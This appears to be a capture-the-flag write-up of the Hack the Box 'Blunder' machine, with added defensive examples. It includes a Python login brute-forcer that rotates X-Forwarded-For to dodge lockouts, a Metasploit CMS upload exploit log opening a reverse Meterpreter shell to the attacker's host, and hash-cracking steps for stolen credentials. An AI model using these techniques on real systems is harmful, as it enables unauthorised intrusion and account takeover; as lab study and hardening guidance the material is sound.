Hack the Box: Blunder

Eswar Abisheak
7 min read · Jul 20, 2020

Persistence is very important. You should not give up unless you are forced to give up — Elon Musk

Reconnaissance:-

Information gathering, getting to know the target system, is the first phase of ethical hacking. Reconnaissance is the set of processes and techniques (footprinting, scanning and enumeration) used to discover and collect information about a target, ideally without drawing attention.

During reconnaissance, an ethical hacker gathers as much information about the target as possible, following the seven steps listed below:

  • Gather initial information
  • Determine the network range
  • Identify active machines
  • Discover open ports and access points
  • Fingerprint the operating system
  • Uncover services on ports
  • Map the network

Enumeration

Enumeration can be used to gain information on −

  • Network shares
  • SNMP data, if they are not secured properly
  • IP and routing tables
  • Usernames on the different systems
  • Password policy details

Enumerations depend on the services that the systems offer. They can be −

  • DNS enumeration
  • NTP enumeration
  • SNMP enumeration
  • Linux/Windows enumeration
  • SMB enumeration

I am using Nmap for service enumeration. Two things to note about the command as I ran it: `vuln` was passed as a second target rather than as `--script vuln`, so Nmap reports `Failed to resolve "vuln"` and simply ignores it, and `-oA SecNotes` is only the prefix for the output files. Since the scan ran without root, Nmap fell back to a TCP connect scan instead of a SYN scan, which is why it took nearly seven minutes against a mostly filtered host.

nmap -sC -sV -oA SecNotes -vv vuln 10.10.10.191

kali@kali:~$ nmap -sC -sV -oA SecNotes -vv vuln 10.10.10.191
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-03 08:30 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:30
Completed NSE at 08:30, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:30
Completed NSE at 08:30, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:30
Completed NSE at 08:30, 0.00s elapsed
Failed to resolve "vuln".
Initiating Ping Scan at 08:30
Scanning 10.10.10.191 [2 ports]
Completed Ping Scan at 08:30, 0.53s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:30
Completed Parallel DNS resolution of 1 host. at 08:30, 0.03s elapsed
Initiating Connect Scan at 08:30
Scanning 10.10.10.191 [1000 ports]
Discovered open port 80/tcp on 10.10.10.191
Connect Scan Timing: About 16.63% done; ETC: 08:33 (0:02:35 remaining)
Connect Scan Timing: About 31.93% done; ETC: 08:33 (0:02:10 remaining)
Connect Scan Timing: About 46.37% done; ETC: 08:34 (0:02:27 remaining)
Connect Scan Timing: About 53.13% done; ETC: 08:35 (0:02:43 remaining)
Connect Scan Timing: About 53.47% done; ETC: 08:36 (0:03:07 remaining)
Connect Scan Timing: About 53.93% done; ETC: 08:37 (0:03:29 remaining)
Connect Scan Timing: About 70.43% done; ETC: 08:36 (0:01:57 remaining)
Connect Scan Timing: About 83.30% done; ETC: 08:36 (0:01:02 remaining)
Completed Connect Scan at 08:36, 359.25s elapsed (1000 total ports)
Initiating Service scan at 08:36
Scanning 1 service on 10.10.10.191
Completed Service scan at 08:36, 8.09s elapsed (1 service on 1 host)
NSE: Script scanning 10.10.10.191.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:36
Completed NSE at 08:36, 26.30s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:36
Completed NSE at 08:36, 5.97s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:36
Completed NSE at 08:36, 0.00s elapsed
Nmap scan report for 10.10.10.191
Host is up, received syn-ack (0.85s latency).
Scanned at 2020-06-03 08:30:09 EDT for 400s
Not shown: 998 filtered ports
Reason: 998 no-responses
PORT STATE SERVICE REASON VERSION
21/tcp closed ftp conn-refused
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|_http-generator: Blunder
| http-methods:
|_ Supported Methods: GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:36
Completed NSE at 08:36, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:36
Completed NSE at 08:36, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:36
Completed NSE at 08:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 401.01 seconds

Only ports 21 and 80 are reported: 21 (FTP) is closed (connection refused), 80 is open, and the other 998 ports are filtered.

Apache httpd 2.4.41 (Ubuntu) is running on port 80, and the http-generator header already names the site "Blunder".

After some enumeration I found that the website is running on ****** *** version *.*.*, leaked by the version parameter in this URL:

http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2

I just googled "****** *** *.*.* exploit" and found an appropriate link. For more details, look up CVE-****-*****.

Then I searched msfconsole for anything related to ******, and found a matching module:

$msfdb run
msf5>search ******
msf5>show info exploit/linux/http/************************

The module requires a valid username and password for the CMS, so before the exploit can be used I need to find a username and a password.

First I need a username, and then a custom wordlist. Since the site is a blog full of facts, its own text is a good source of candidate passwords, so I build the wordlist with cewl:

cewl -w wordlists.txt -d 10 -m 1 http://10.10.10.191/

That gives me my wordlist (`-d 10` is the crawl depth, `-m 1` keeps words of any length, so expect a lot of noise).

Now I resume enumeration with a directory search, fuzzing for .txt files. The name blunder.htb only resolves if you map it to 10.10.10.191 in /etc/hosts.

$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://blunder.htb/FUZZ.txt" -t 100 
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://blunder.htb/FUZZ.txt
Total requests: 4652

==================================================================
ID           Response   Lines    Word     Chars       Payload
==================================================================

000003513:   200        1 L      4 W      22 Ch       "******"
000004119:   200        4 L      23 W     118 Ch      "****"

Total time: 44.66474
Processed Requests: 4652
Filtered Requests: 4650
Requests/sec.: 104.1537

That turns up two files. Visiting them, one is a to-do list that leaks a username:

-Update the CMS 
-Turn off FTP-DONE
-Remove old users-DONE
-Inform f****s that the new blog needs images-PENDING

I think I found the username: f****s.

Now I have to find the password so I can log in and use the ****** exploit.

This is a simple script to brute-force the login with the wordlist. Two details matter: it fetches a fresh CSRF token for every attempt, because the token is bound to the session, and it sets the X-Forwarded-For header to a new value on every request, so a login lockout that takes the client address from that header never trips.

#!/usr/bin/env python3
import re
import requests

# Point these at the target; the original lab host and path are left as found.
host = 'http://192.168.194.146/******'
login_url = host + '/admin/login'
username = 'admin'   # replace with the username found during enumeration
wordlist = []

# Generate 50 incorrect passwords (replace with the cewl wordlist for a real run)
for i in range(50):
    wordlist.append('Password{i}'.format(i = i))

# Add the correct password to the end of the list
wordlist.append('adminadmin')

for password in wordlist:
    # Fresh session per attempt: the CSRF token belongs to the session that fetched it
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    headers = {
        # A different value every request, so a lockout keyed on this header never triggers
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    # A successful login answers with a redirect to the dashboard; a failure re-renders the form
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
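Why rotating X-Forwarded-For works, as an added example (my own simulation, not the CMS's code and not from the original post): a login lockout that takes the client address from a request header can be reset by the attacker on every attempt, while one keyed on the TCP peer address cannot. The class names, the threshold of 10 attempts and the attacker address are assumptions.

```python
#!/usr/bin/env python3
"""Simulated login rate limiters: why a new X-Forwarded-For per request
defeats a lockout keyed on that header. Added example, not the CMS's code."""
from collections import defaultdict

MAX_ATTEMPTS = 10  # assumed lockout threshold (hypothetical)


class NaiveLoginLimiter:
    """Keys the lockout on X-Forwarded-For when present (the weak design)."""

    def __init__(self, max_attempts=MAX_ATTEMPTS):
        self.max_attempts = max_attempts
        self.failures = defaultdict(int)

    def client_key(self, peer_ip, headers):
        # Trusting a client-supplied header lets the attacker choose the key.
        return headers.get("X-Forwarded-For", peer_ip)

    def allow(self, peer_ip, headers):
        return self.failures[self.client_key(peer_ip, headers)] < self.max_attempts

    def record_failure(self, peer_ip, headers):
        self.failures[self.client_key(peer_ip, headers)] += 1


class HardenedLoginLimiter(NaiveLoginLimiter):
    """Keys the lockout on the TCP peer address and honours X-Forwarded-For
    only when the request arrived from a known reverse proxy."""

    def __init__(self, trusted_proxies=(), max_attempts=MAX_ATTEMPTS):
        super().__init__(max_attempts)
        self.trusted_proxies = set(trusted_proxies)

    def client_key(self, peer_ip, headers):
        xff = headers.get("X-Forwarded-For")
        if peer_ip in self.trusted_proxies and xff:
            # The rightmost hop is the one the trusted proxy appended;
            # anything left of it is attacker-controlled.
            return xff.split(",")[-1].strip()
        return peer_ip


def run_bruteforce(limiter, passwords, correct, peer_ip="10.10.14.134"):
    """Replays the script's strategy (a new X-Forwarded-For value per attempt).
    Returns (password_or_None, attempts_allowed, attempts_blocked)."""
    allowed = blocked = 0
    for password in passwords:
        headers = {"X-Forwarded-For": password}
        if not limiter.allow(peer_ip, headers):
            blocked += 1
            continue
        allowed += 1
        if password == correct:
            return password, allowed, blocked
        limiter.record_failure(peer_ip, headers)
    return None, allowed, blocked


# Constructed wordlist: 50 wrong guesses then the right one, mirroring the script.
WORDLIST = ["Password{}".format(i) for i in range(50)] + ["adminadmin"]

if __name__ == "__main__":
    print("naive:   ", run_bruteforce(NaiveLoginLimiter(), WORDLIST, "adminadmin"))
    print("hardened:", run_bruteforce(HardenedLoginLimiter(), WORDLIST, "adminadmin"))
```

Against the naive limiter all 51 guesses go through; the hardened one stops after 10 and the right password is never tried. Note that the hardened limiter degrades to the naive one if the attacker can reach the application directly and is listed as a trusted proxy, so the proxy must be the only route to the login endpoint.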

With the username and password in hand I can now use the exploit module.

kali@kali:~$ msfconsole

(msfconsole startup banner trimmed)
https://metasploit.com


=[ metasploit v5.0.91-dev ]
+ -- --=[ 2023 exploits - 1101 auxiliary - 343 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

Metasploit tip: When in a module, use back to go back to the top level prompt

msf5 > use exploit/linux/http/******_******_******_******
msf5 exploit(linux/http/******_******_******_******) > set TARGET 0
TARGET => 0
msf5 exploit(linux/http/******_******_******_******) > set RHOST 10.10.10.191
RHOST => 10.10.10.191
msf5 exploit(linux/http/******_******_******_******) > set RPORT 80
RPORT => 80
msf5 exploit(linux/http/******_******_******_******) > set ******USER ******
******USER => ******
msf5 exploit(linux/http/******_******_******_******) > set ******PASS **************
******PASS => ************
msf5 exploit(linux/http/******_******_******_******) > exploit

[*] Started reverse TCP handler on 10.10.14.134:4444
[+] Logged in as: ******
[*] Retrieving UUID...
[*] Uploading aQOeFykarH.png...
[*] Uploading .htaccess...
[*] Executing aQOeFykarH.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.14.134:4444 -> 10.10.10.191:50214) at 2020-06-09 09:33:46 -0400
[+] Deleted .htaccess

meterpreter > shell
Process 3274 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c "import pty;pty.spawn('/bin/bash')"
www-data@blunder:/var/www/******-3.10.0a/bl-content/databases$
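What the module output implies, and the server-side check a defender wants: the exploit uploads an image together with a .htaccess file and then requests the image, so it is the per-directory .htaccess that persuades Apache to execute the upload as code. That only works where AllowOverride permits .htaccess in the upload directory. The configuration below is an added example, not the box's or the CMS's own config; the directory path is an assumption.

```apache
# Assumed layout: CMS content directory under /var/www/cms/bl-content

# Weak: any .htaccess dropped into an upload directory is honoured,
# so an uploaded file can redefine how its neighbours are served.
<Directory "/var/www/cms/bl-content">
    AllowOverride All
</Directory>

# Hardened: ignore uploaded .htaccess files and refuse to execute
# anything stored under the content tree.
<Directory "/var/www/cms/bl-content">
    AllowOverride None
    # mod_php only; with php-fpm, leave the .php handler unmapped here instead
    php_admin_flag engine off
    <FilesMatch "\.(php|phtml|phar)$">
        Require all denied
    </FilesMatch>
</Directory>
```

A quick check on a running server is `apachectl -t -D DUMP_INCLUDES` plus a grep for `AllowOverride` in the dumped files; any value other than `None` on a directory that accepts uploads is worth a finding.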

That was quick: we have a shell on the Blunder box as www-data. Let's grab the user flag.

But www-data doesn't have permission to read it; only hugo does.

A little browsing of the CMS directories helps a lot. There are two copies of the CMS under /var/www, and the user database is a plain file under bl-content/databases that www-data can read:

www-data@blunder:/var/www/******-3.10.0a/bl-content/databases$ cat users.php
cat users.php
<?php defined('******') or die('****** CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca******************823c695******eb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
hashid faca******************823c695******eb98d
faca******************823c695******eb98d sha1 ***********

hashid identifies the 40-hex-character value as SHA-1 (it also lists other 160-bit candidates, but SHA-1 is the one that fits a PHP application). A lookup against a public reverse-hash table recovers the password:

Online hash lookup: https://md5decrypt.net/en/Sha1

On a real engagement, don't paste client hashes into a third-party site; crack them offline against the cewl wordlist instead, e.g. `hashcat -m 100` or `john --format=raw-sha1`. If the user record carries a salt field, the stored value is a hash over password and salt, and a plain lookup will miss it.
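The offline version of that lookup, as an added example rather than anything from the post: parse a users.php-style file (a PHP guard line followed by JSON), pull out every password hash, and test the cewl words with a few cheap mangling rules against SHA-1. The sample record, its password and the wordlist are constructed here; the salt handling assumes the hash is computed over password followed by salt, which must be checked against the CMS source.

```python
#!/usr/bin/env python3
"""Parse a users.php-style file and crack its SHA-1 hashes offline.
Added example; the sample record, password and wordlist are constructed."""
import hashlib
import json
import re

# The file starts with "<?php defined('...') or die('...'); ?>" and is JSON after that.
PHP_GUARD = re.compile(r"^\s*<\?php.*?\?>\s*", re.DOTALL)


def parse_users_php(text):
    """Strip the PHP guard line and return the user table as a dict."""
    return json.loads(PHP_GUARD.sub("", text, count=1))


def extract_hashes(users):
    """Map username -> (hash, salt). Records may or may not carry a salt."""
    return {name: (rec["password"].lower(), rec.get("salt", ""))
            for name, rec in users.items()}


def mangle(word):
    """Cheap rule set: as-is, capitalised, upper-cased, plus common suffixes."""
    base = {word, word.capitalize(), word.upper()}
    out = set(base)
    for w in base:
        for suffix in ("1", "123", "2019", "2020", "!"):
            out.add(w + suffix)
    return out


def crack_sha1(target_hex, candidates, salt=""):
    """Return the candidate whose sha1(candidate + salt) matches, else None.
    The concatenation order is an assumption; confirm it in the CMS source."""
    target_hex = target_hex.lower()
    for cand in candidates:
        if hashlib.sha1((cand + salt).encode()).hexdigest() == target_hex:
            return cand
    return None


def crack_users_php(text, wordlist):
    """Try every record in the file; returns {username: password} for hits."""
    candidates = set()
    for word in wordlist:
        candidates |= mangle(word)
    candidates = sorted(candidates)
    found = {}
    for name, (digest, salt) in extract_hashes(parse_users_php(text)).items():
        hit = crack_sha1(digest, candidates, salt)
        if hit is not None:
            found[name] = hit
    return found


# --- constructed sample data (not the box's real hash or password) ---
SAMPLE_PASSWORD = "Facts2020"   # constructed; reachable via mangle("facts")
SAMPLE_HASH = hashlib.sha1(SAMPLE_PASSWORD.encode()).hexdigest()
SAMPLE_USERS_PHP = '''<?php defined('EXAMPLE') or die('Example CMS.'); ?>
{
  "admin": {
    "nickname": "Hugo",
    "role": "User",
    "password": "%s",
    "registered": "2019-11-27 07:40:55"
  }
}
''' % SAMPLE_HASH
SAMPLE_WORDLIST = ["blunder", "facts", "interesting", "blog"]  # constructed cewl-style output

if __name__ == "__main__":
    print(crack_users_php(SAMPLE_USERS_PHP, SAMPLE_WORDLIST))
```

To use it on a real file, read `users.php` into `text` and pass the lines of `wordlists.txt` as the wordlist; if the records contain a salt field, `extract_hashes` picks it up and `crack_sha1` appends it to each candidate.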

Got the Password for the user named hugo.

www-data@blunder:/var/www/******-3.9.2/bl-content/tmp$ su hugo
su hugo
Password: ***********

hugo@blunder:/var/www/******-3.9.2/bl-content/tmp$ ls
ls
fuhvuzqd.jpg thumbnails ybzqxfmw.jpg
hugo@blunder:/var/www/******-3.9.2/bl-content/tmp$ cd ~
cd ~
hugo@blunder:~$ ls
ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
hugo@blunder:~$ cat user.txt
cat user.txt
69************67d***13***73d***b

I grabbed the user flag and submitted it. Hurray, I own user; next I need to own the root flag too.

There is still a long way to go from here.

Remaining stuff

  1. Privilege Escalation
  2. Getting Root Shell
  3. Grab Root Flag

Hmm, as Blunder is an active machine I can't reveal the hidden stuff and the remaining steps. I will edit this again as soon as the Blunder box is retired. But this is the basic path to follow.

Thanks to egotisticalSW

I hope you have learned something from my approach. If you have any issue or question, please let me know in the comment section. Thanks for reading this walkthrough.
